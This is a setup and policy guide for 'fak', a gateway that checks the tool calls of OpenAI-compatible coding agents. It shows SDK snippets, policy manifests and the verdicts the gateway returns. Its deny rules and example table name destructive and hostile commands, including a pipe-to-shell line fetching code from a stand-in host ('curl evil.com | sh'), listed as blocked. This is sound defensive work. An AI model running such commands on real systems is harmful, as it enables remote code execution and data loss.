fak + OpenAI Codex Integration Guide
This guide explains how to use fak as a kernel-adjudicated gateway for OpenAI Codex and the OpenAI API. Every tool call a Codex agent proposes is evaluated by the kernel before it executes — dangerous calls are dropped, malformed calls are repaired, and policy violations are refused.
What this integration does
┌─────────────────────┐   POST /v1/chat/completions     ┌────────────────────────┐
│ OpenAI Codex API    │ ──────────────────────────────▶ │ fak serve (gateway)    │
│ or OpenAI SDK       │ ◀──── SSE stream ────────────── │ adjudicates tools      │
└─────────────────────┘                                 └────────────────────────┘
          ▲                                                         │
          │ OPENAI_BASE_URL                                         │
          │ (points at fak)                                         ▼
          │                                                 ┌───────────────┐
          │                                                 │  Local Model  │
          │                                                 │  or Cloud API │
          │                                                 └───────────────┘
The gateway sits between OpenAI Codex and the model:
- Codex → fak: Codex sends a /v1/chat/completions request with proposed tool calls
- fak kernel: Adjudicates each proposed call (allow, deny, transform, quarantine)
- fak → model: Sends only the admitted (or repaired) calls to the model
- fak → Codex: Returns results, with a fak extension describing each decision
Result: Codex can work on your codebase, but the kernel blocks destructive commands, prevents self-modification, and contains untrusted tool results.
Note: OpenAI Codex is the code-generation model family that powers GitHub Copilot and other coding assistants. While OpenAI has deprecated the standalone Codex API in favor of GPT-4 and GPT-4 Turbo (which include code-generation capabilities), this integration works with any OpenAI-compatible coding model.
Quick Start
Prerequisites
- OpenAI API key — Get one from https://platform.openai.com/api-keys
- fak binary — Built from this repo or downloaded from releases
- A model to serve — OpenAI API, a local OpenAI-compatible server, or the in-kernel model
Option 1: Proxy OpenAI API with kernel adjudication
Start fak serve in front of the real OpenAI API:
cd fleet/fak
go build -o fak ./cmd/fak
export OPENAI_API_KEY="sk-..."
./fak serve \
--addr 127.0.0.1:8080 \
--provider openai \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo \
--policy examples/dev-agent-policy.json
Verify it’s running:
curl http://127.0.0.1:8080/healthz
# {"ok":true,"model":"gpt-4-turbo","engine":"inkernel"}
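A script that starts fak serve and then launches a client may want to wait until the gateway answers. The sketch below polls /healthz from Python; the function names, timeout, and polling interval are illustrative choices, and it relies only on the "ok" field shown in the sample response above.

```python
import json
import time
import urllib.error
import urllib.request


def is_ready(body: str) -> bool:
    """Return True if a /healthz body is valid JSON with "ok": true."""
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return False
    return isinstance(payload, dict) and payload.get("ok") is True


def wait_until_ready(url: str = "http://127.0.0.1:8080/healthz",
                     timeout_s: float = 30.0,
                     interval_s: float = 0.5) -> bool:
    """Poll the health endpoint until it reports ok or the timeout expires."""
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        try:
            with urllib.request.urlopen(url, timeout=2) as resp:
                if is_ready(resp.read().decode("utf-8")):
                    return True
        except (urllib.error.URLError, OSError):
            pass  # gateway not listening yet; retry after a short sleep
        time.sleep(interval_s)
    return False
```

Calling wait_until_ready() before creating the SDK client avoids a connection error on the first request.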
Option 2: Use a local model (no API costs)
Use an OpenAI-compatible local server like Ollama, vLLM, or llama-server:
# Start Ollama
ollama serve &
ollama pull codellama:7b
# Start fak in front of it
./fak serve \
--addr 127.0.0.1:8080 \
--base-url http://localhost:11434/v1 \
--model codellama:7b \
--policy examples/dev-agent-policy.json
Using with OpenAI SDKs
Python SDK
import openai
# Point the SDK at fak instead of OpenAI directly
client = openai.OpenAI(
base_url="http://127.0.0.1:8080/v1",
api_key="fak-local" # fak accepts any key for local testing
)
response = client.chat.completions.create(
model="gpt-4-turbo",
messages=[{
"role": "user",
"content": "List all Go files in the current directory"
}],
tools=[{
"type": "function",
"function": {
"name": "Bash",
"description": "Run shell commands",
"parameters": {
"type": "object",
"properties": {
"command": {"type": "string"}
},
"required": ["command"]
}
}
}]
)
# Check what fak did
if hasattr(response, '_fak'):
    print(f"Adjudication: {response._fak}")
JavaScript/TypeScript SDK
import OpenAI from 'openai';
const client = new OpenAI({
baseURL: 'http://127.0.0.1:8080/v1',
apiKey: 'fak-local',
});
const response = await client.chat.completions.create({
model: 'gpt-4-turbo',
messages: [{ role: 'user', content: 'Read package.json' }],
tools: [{
type: 'function',
function: {
name: 'Read',
description: 'Read a file',
parameters: {
type: 'object',
properties: {
file_path: { type: 'string' }
},
required: ['file_path']
}
}
}]
});
cURL
curl http://127.0.0.1:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer fak-local" \
-d '{
"model": "gpt-4-turbo",
"messages": [{"role": "user", "content": "List Go files"}],
"tools": [{
"type": "function",
"function": {
"name": "Bash",
"description": "Run commands",
"parameters": {
"type": "object",
"properties": {"command": {"type": "string"}},
"required": ["command"]
}
}
}]
}'
Architecture Overview
The three components
| Component | What it is | Who starts it |
|---|---|---|
| Model server | The process that generates tokens (OpenAI API, Ollama, vLLM, llama-server, or the in-kernel model) | You or your infra |
| fak serve | The gateway that speaks OpenAI API, adjudicates tool calls, and proxies to the model | You (or your orchestration) |
| Codex/OpenAI client | The SDK/CLI that sends coding prompts and tool calls | Your application |
What fak serve exposes
| Route | Purpose |
|---|---|
| POST /v1/chat/completions | OpenAI Chat Completions API (tool calling proxy) |
| POST /v1/messages | Anthropic Messages API (also supported) |
| GET /healthz | Health check ({"ok":true,"model":"...","engine":"..."}) |
| GET /v1/models | Advertises the served model id |
| POST /v1/fak/syscall | Run one adjudicated tool call (dispatch to registered engine) |
| POST /v1/fak/adjudicate | Get a verdict without executing |
| POST /v1/fak/admit | Send a tool result through the result-side floor |
| GET /v1/fak/changes | Cross-agent “what changed” feed (vDSO coherence) |
| POST /v1/fak/revoke | Revoke a poisoned witness |
| GET /metrics | Prometheus metrics |
| POST /mcp | MCP-over-HTTP |
The kernel’s adjudication
For every tool call the model proposes, the kernel evaluates:
- Allow-list: is the tool named on the policy’s allow-list?
- Argument rules: does the argument match a deny regex? (e.g., rm -rf, sudo, git push)
- Self-modify guard: is the target path in .git/, internal/kernel/, etc.?
- Result quarantine: does a tool result contain secrets or poisoned content?
- IFC taint: is the trace’s taint high-water mark elevated?
Verdicts: ALLOW, DENY (with reason), TRANSFORM (grammar repair), QUARANTINE (paged out)
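To make the ordering of the call-side checks concrete, here is a minimal Python sketch of the first three (allow-list, argument rules, self-modify guard). It is an illustration only, not fak's implementation: the rule values are copied from the examples in this guide, the NOT_ALLOWED reason string is hypothetical, and result quarantine and IFC taint are left out because they depend on kernel state.

```python
import re
from typing import Optional, Tuple

# Hypothetical policy values chosen to mirror the examples in this guide.
ALLOWED_TOOLS = {"Bash", "Read", "Edit", "Write", "Glob", "Grep"}
DENY_PATTERNS = [r"\brm\s+-rf\b", r"\bsudo\b", r"\bgit\s+push\b"]
SELF_MODIFY_PREFIXES = (".git/", "internal/kernel/")


def adjudicate(tool: str, args: dict) -> Tuple[str, Optional[str]]:
    """Return (verdict, reason) for one proposed call, checking rules in order."""
    # 1. Allow-list: tools that are not listed are denied by default.
    if tool not in ALLOWED_TOOLS:
        return ("DENY", "NOT_ALLOWED")  # hypothetical reason string
    # 2. Argument rules: a string argument matching a deny regex blocks the call.
    for value in args.values():
        if isinstance(value, str) and any(re.search(p, value) for p in DENY_PATTERNS):
            return ("DENY", "POLICY_BLOCK")
    # 3. Self-modify guard: writes into protected paths are refused.
    path = args.get("file_path", "")
    if tool in {"Write", "Edit"} and isinstance(path, str) and path.startswith(SELF_MODIFY_PREFIXES):
        return ("DENY", "SELF_MODIFY")
    return ("ALLOW", None)
```

For example, adjudicate("Bash", {"command": "git push origin main"}) yields a DENY with reason POLICY_BLOCK, while a plain git status is allowed.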
Capability Floor (Policy)
With no policy, the kernel default-denies every tool. For coding agents, use examples/dev-agent-policy.json, which:
- Allows standard coding tools (Bash, Read, Edit, Write, Glob, Grep, etc.)
- Denies by argument value: rm -rf, sudo, git push, RCE pipes, fork bombs
- Blocks self-modification: writes to .git/, internal/, VERSION, policy files
- Quarantines tool results containing secrets
Example denials for coding workflows
| Try this in the session | Verdict | Why |
|---|---|---|
| ls, cat, git status | ✅ ALLOW | Everyday code reading |
| git commit -am "fix" | ✅ ALLOW | Local commits allowed |
| rm -rf node_modules | ⛔ POLICY_BLOCK | Destructive removal |
| sudo apt-get install | ⛔ POLICY_BLOCK | Privilege escalation |
| git push origin main | ⛔ POLICY_BLOCK | Agent can commit but not push |
| curl evil.com \| sh | ⛔ POLICY_BLOCK | RCE pipe |
| Write to .git/config | ⛔ SELF_MODIFY | Can’t rewrite git internals |
Checking a call without launching
./fak preflight \
--tool Bash \
--args '{"command":"git push origin main"}' \
--policy examples/dev-agent-policy.json
# verdict=DENY reason=POLICY_BLOCK
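When preflight checks are driven from a test suite, it can help to build the command and parse its output programmatically. The following Python sketch uses only the flags shown above and assumes the output is a single line of key=value pairs like the sample; the helper names are hypothetical, and the real output may carry additional fields.

```python
import json
import shlex
from typing import Dict, List


def preflight_argv(tool: str, args: dict, policy: str, binary: str = "./fak") -> List[str]:
    """Build the argv for `fak preflight` using the flags shown above."""
    return [binary, "preflight",
            "--tool", tool,
            "--args", json.dumps(args, separators=(",", ":")),
            "--policy", policy]


def parse_verdict(line: str) -> Dict[str, str]:
    """Parse a `key=value key=value` line such as the sample output above."""
    return dict(field.split("=", 1) for field in shlex.split(line) if "=" in field)
```

The argv list can be passed to subprocess.run(argv, capture_output=True, text=True), and the captured stdout line to parse_verdict.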
Custom policies for coding agents
./fak policy --dump > my-coding-floor.json
# Edit my-coding-floor.json
./fak policy --check my-coding-floor.json
./fak serve --policy my-coding-floor.json ...
Example Coding Workflows
Workflow 1: Code review agent
An agent that reviews code but cannot modify it:
{
"version": "fak-policy/v1",
"posture": "fail_closed",
"allow": ["Read", "Glob", "Grep"],
"allow_prefix": ["read_", "get_", "search_", "list_"],
"deny": {
"Write": "POLICY_BLOCK",
"Edit": "POLICY_BLOCK",
"Bash": "POLICY_BLOCK"
},
"self_modify_globs": [".git/", ".claude/", "policy.json"]
}
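One way to reason about a manifest like this is to evaluate tool names against it by hand. The Python sketch below does so under assumed semantics (an explicit deny wins, then the allow list, then allow_prefix, and everything else is refused under fail_closed); the precedence order and the DEFAULT_DENY label are assumptions for illustration, so check fak/POLICY.md for the actual rules.

```python
from typing import Optional, Tuple

# The code-review policy from this section, reduced to its name-level fields.
REVIEW_POLICY = {
    "allow": ["Read", "Glob", "Grep"],
    "allow_prefix": ["read_", "get_", "search_", "list_"],
    "deny": {"Write": "POLICY_BLOCK", "Edit": "POLICY_BLOCK", "Bash": "POLICY_BLOCK"},
}


def check_tool(policy: dict, tool: str) -> Tuple[bool, Optional[str]]:
    """Return (admitted, reason). Assumed order: deny, then allow, then prefix."""
    deny = policy.get("deny", {})
    if tool in deny:
        return (False, deny[tool])
    if tool in policy.get("allow", []):
        return (True, None)
    if any(tool.startswith(prefix) for prefix in policy.get("allow_prefix", [])):
        return (True, None)
    # fail_closed posture: anything not explicitly admitted is refused.
    return (False, "DEFAULT_DENY")  # hypothetical label
```

Under these assumptions, Read and list_files are admitted, Bash is refused with POLICY_BLOCK, and an unlisted tool falls through to the default denial.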
Workflow 2: Safe refactoring agent
An agent that can edit files but cannot push to remote or install packages:
{
"version": "fak-policy/v1",
"posture": "fail_closed",
"allow": ["Read", "Write", "Edit", "Glob", "Grep", "Bash"],
"allow_prefix": ["read_", "get_", "search_", "list_"],
"deny": {
"git_push": "POLICY_BLOCK",
"npm_install": "POLICY_BLOCK",
"pip_install": "POLICY_BLOCK",
"cargo_install": "POLICY_BLOCK"
},
"self_modify_globs": [".git/", ".claude/", "policy.json", "internal/"]
}
Workflow 3: Full-stack dev agent (CI/CD only)
An agent with the full set of dev tools that still cannot publish or modify the kernel:
./fak serve \
--policy examples/dev-agent-policy.json \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo
The dev-agent-policy.json allows all dev tools but blocks:
- git push (no direct publishing)
- npm publish (no package publishing)
- Writes to .git/, internal/kernel/ (no self-modification)
Common Patterns for Coding Agents
Pattern 1: Agent with test sandbox
Give the agent a dedicated sandbox directory:
export SANDBOX="/tmp/codex-sandbox-$$"
mkdir -p "$SANDBOX"
./fak serve \
--policy examples/dev-agent-policy.json \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo
# In your prompt, tell the agent:
# "All work must be done in $SANDBOX. Never write files outside that directory."
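A prompt instruction is advisory, so a client that executes file-writing tool calls itself may want to verify paths before acting. The sketch below is one possible client-side check in Python; it is not a fak feature, and the function name is hypothetical.

```python
from pathlib import Path


def inside_sandbox(sandbox: str, candidate: str) -> bool:
    """Return True if candidate, resolved relative to sandbox, stays inside it."""
    root = Path(sandbox).resolve()
    # Joining with an absolute candidate discards root, so absolute paths
    # outside the sandbox are rejected by the containment test below.
    target = (root / candidate).resolve()
    return target == root or root in target.parents
```

Because resolve() collapses ".." segments and follows existing symlinks, a path such as ../other/file is rejected even though it starts from the sandbox directory.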
Pattern 2: Read-only exploration
./fak serve \
--policy examples/research-agent-policy.json \
--addr 127.0.0.1:8080 \
--model gpt-4-turbo
The research-agent-policy.json only allows read operations:
- ✅ Read, Glob, Grep, list_files
- ❌ Write, Edit, Bash
Pattern 3: Dry-run DevOps
./fak serve \
--policy examples/devops-dryrun-policy.json \
--addr 127.0.0.1:8080 \
--model gpt-4-turbo
The devops-dryrun-policy.json allows planning but blocks:
- terraform apply (use plan only)
- kubectl apply (use --dry-run only)
- Any delete operations
Pattern 4: Multi-model setup
Route different tasks to different models by running multiple fak instances:
# Instance 1: Fast code completion (smaller model)
./fak serve \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--model gpt-3.5-turbo \
--policy examples/dev-agent-policy.json &
# Instance 2: Deep code review (larger model)
./fak serve \
--addr 127.0.0.1:8081 \
--base-url https://api.openai.com/v1 \
--model gpt-4-turbo \
--policy examples/research-agent-policy.json &
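On the client side, the two instances can be selected with a small lookup. This Python sketch assumes the ports and models from the commands above; the task names "completion" and "review" are illustrative labels, not anything fak defines.

```python
# Ports match the two instances started above; the task names are illustrative.
ENDPOINTS = {
    "completion": "http://127.0.0.1:8080/v1",  # gpt-3.5-turbo, dev-agent policy
    "review": "http://127.0.0.1:8081/v1",      # gpt-4-turbo, research-agent policy
}
MODELS = {"completion": "gpt-3.5-turbo", "review": "gpt-4-turbo"}


def route(task: str) -> dict:
    """Return the base_url and model to use for a task kind."""
    if task not in ENDPOINTS:
        raise ValueError(f"unknown task kind: {task!r}")
    return {"base_url": ENDPOINTS[task], "model": MODELS[task]}
```

A caller would then construct the SDK client with openai.OpenAI(base_url=route("review")["base_url"], api_key="fak-local") and pass the returned model name in the request.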
Advanced Usage
Authentication
For production use, require an API key:
./fak serve \
--addr 0.0.0.0:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo \
--require-key-env FAK_TOKEN
Clients must send Authorization: Bearer $FAK_TOKEN.
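For a client that does not use the OpenAI SDK, the header can be attached by hand. The sketch below builds such a request with Python's standard library; the helper name is hypothetical, and it assumes the token is available to the client in the FAK_TOKEN environment variable.

```python
import json
import os
import urllib.request


def build_request(base_url: str, payload: dict,
                  token_env: str = "FAK_TOKEN") -> urllib.request.Request:
    """Build a chat-completions request carrying the bearer token from the environment."""
    token = os.environ.get(token_env)
    if not token:
        raise RuntimeError(f"{token_env} is not set")
    return urllib.request.Request(
        url=base_url.rstrip("/") + "/chat/completions",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {token}"},
        method="POST",
    )
```

With the OpenAI SDK no extra code is needed: the api_key passed to the client is sent as the bearer token, so api_key=os.environ["FAK_TOKEN"] has the same effect.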
Observability
Prometheus metrics:
curl http://127.0.0.1:8080/metrics
Key metrics for coding agents:
fak_syscall_duration_seconds{verdict="ALLOW"}
fak_syscall_duration_seconds{verdict="DENY"}
fak_vdso_hits_total
fak_quarantine_evictions_total
fak_turn_tax_denials_total
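For quick checks without a Prometheus server, the /metrics text can be parsed directly. The following Python sketch handles the common "name{labels} value" line shape of the Prometheus text format; it is deliberately simplified (label values containing "}" are not supported), and the function name is hypothetical.

```python
import re
from typing import Dict

# Matches `name{labels} value` or `name value`; comment lines start with '#'.
_SAMPLE = re.compile(r'^([A-Za-z_:][A-Za-z0-9_:]*)(\{[^}]*\})?\s+(\S+)')


def parse_metrics(text: str) -> Dict[str, float]:
    """Map each sample (metric name plus label set) to its numeric value."""
    samples: Dict[str, float] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and HELP/TYPE comments
        match = _SAMPLE.match(line)
        if match:
            key = match.group(1) + (match.group(2) or "")
            samples[key] = float(match.group(3))
    return samples
```

Feeding it the body returned by the curl command above gives a dictionary that can be filtered by metric name, for instance to watch fak_quarantine_evictions_total between runs.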
The fak response extension
Every chat completion response includes a _fak extension with adjudication details:
{
"id": "chatcmpl-...",
"choices": [{
"message": {
"role": "assistant",
"content": null,
"tool_calls": [...]
}
}],
"_fak": {
"version": "fak/v1",
"admissions": [
{
"tool": "Bash",
"verdict": "ALLOW",
"by": "monitor",
"trace_id": "..."
}
]
}
}
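A client can use this extension to surface calls that were not simply allowed. The Python sketch below works on the raw response body parsed into a dict and assumes only the field names shown in the example above; the function name is hypothetical.

```python
from typing import List


def non_allowed(response: dict) -> List[dict]:
    """Return admissions from the _fak extension whose verdict is not ALLOW."""
    admissions = response.get("_fak", {}).get("admissions", [])
    return [entry for entry in admissions if entry.get("verdict") != "ALLOW"]
```

An empty list means every proposed call was admitted as-is; a response without a _fak key also yields an empty list, so the helper is safe to call against a plain OpenAI response.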
Environment reference
| Variable | Purpose | Default |
|---|---|---|
| OPENAI_BASE_URL | Points OpenAI SDK at fak | http://127.0.0.1:8080/v1 |
| OPENAI_API_KEY | Auth for OpenAI upstream | Set for proxy mode |
| FAK_ADDR | fak listen address | 127.0.0.1:8080 |
| FAK_POLICY | Policy manifest path | (none = default-deny) |
| FAK_MODEL | Advertised model id | Set by --model |
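As a sketch of how a client might resolve these settings, the Python helper below reads OPENAI_BASE_URL and falls back to the local address used throughout this guide. The function name is hypothetical, and using FAK_TOKEN as the client key assumes the setup from the Authentication section.

```python
from typing import Mapping


def client_settings(env: Mapping[str, str]) -> dict:
    """Resolve base_url and api_key for a client pointed at fak."""
    return {
        "base_url": env.get("OPENAI_BASE_URL", "http://127.0.0.1:8080/v1"),
        # "fak-local" is the placeholder key used in this guide's local examples.
        "api_key": env.get("FAK_TOKEN", "fak-local"),
    }
```

Passing os.environ gives settings that can be splatted into the SDK constructor, as in openai.OpenAI(**client_settings(os.environ)).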
Models That Work
OpenAI models (via proxy)
| Model | Good for | Notes |
|---|---|---|
| gpt-4-turbo | General coding, refactoring | Best balance of speed/capability |
| gpt-4 | Complex architecture | Slower but more thorough |
| gpt-3.5-turbo | Quick edits, completions | Fast, cost-effective |
| o1-preview | Deep reasoning | New reasoning models (check API support) |
Local models (OpenAI-compatible)
| Model | Good for | Server |
|---|---|---|
| codellama:7b | Code completion | Ollama |
| codellama:34b | Complex refactoring | Ollama |
| deepseek-coder:6.7b | Fast edits | Ollama |
| qwen2.5-coder:7b | General coding | Ollama |
| Qwen2.5-Coder-32B-Instruct | Large codebase work | vLLM/llama-server |
Running with vLLM
# Install vLLM
pip install vllm
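# Start vLLM with CodeLlama
# --tool-call-parser needs a value: set TOOL_PARSER to the parser name that matches your model
vllm serve codellama/CodeLlama-7b-Instruct-hf \
--host 127.0.0.1 \
--port 8131 \
--enable-auto-tool-choice \
--tool-call-parser "$TOOL_PARSER"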
# Start fak
./fak serve \
--addr 127.0.0.1:8080 \
--base-url http://127.0.0.1:8131/v1 \
--model codellama/CodeLlama-7b-Instruct-hf
Troubleshooting
| Symptom | Fix |
|---|---|
| 401 Unauthorized from upstream | Check OPENAI_API_KEY is set |
| All calls denied | Check policy is loaded with --policy |
| Model ignores tools | Use a tool-calling model (GPT-4/3.5, not base completion) |
| Slow first request | Model is warming up; subsequent requests are faster |
| fak: command not found | Build with go build -o fak ./cmd/fak |
| Port 8080 in use | Use a different port, e.g. --addr 127.0.0.1:8090 |
Debug mode
# Enable verbose logging
./fak serve \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--model gpt-4-turbo \
--debug
# Check the policy that loaded
./fak policy --dump
Cross-references
- fak/GETTING-STARTED.md: fak install and run guide
- fak/POLICY.md: Policy manifest schema and workflow
- fak/ARCHITECTURE.md: fak internal architecture
- docs/integrations/claude.md: Claude Code integration (similar patterns)
- examples/README.md: Policy manifest templates for different agent types
Migration from direct OpenAI API
If you’re currently calling OpenAI directly and want to add the kernel boundary:
Before (direct):
client = openai.OpenAI(api_key="sk-...")
response = client.chat.completions.create(model="gpt-4", messages=...)
After (with fak):
# 1. Point the SDK at fak instead
client = openai.OpenAI(
base_url="http://127.0.0.1:8080/v1",
api_key="fak-local" # fak forwards real key to OpenAI
)
# 2. Start fak with your OpenAI key
# (in your terminal/startup script)
./fak serve \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4 \
--policy examples/dev-agent-policy.json
# 3. The rest of your code stays the same
response = client.chat.completions.create(model="gpt-4", messages=...)
The only client-side change is the SDK’s base_url (plus the placeholder API key); once fak serve is running, your existing tools and prompts work unchanged, and every tool call now goes through the kernel’s capability floor.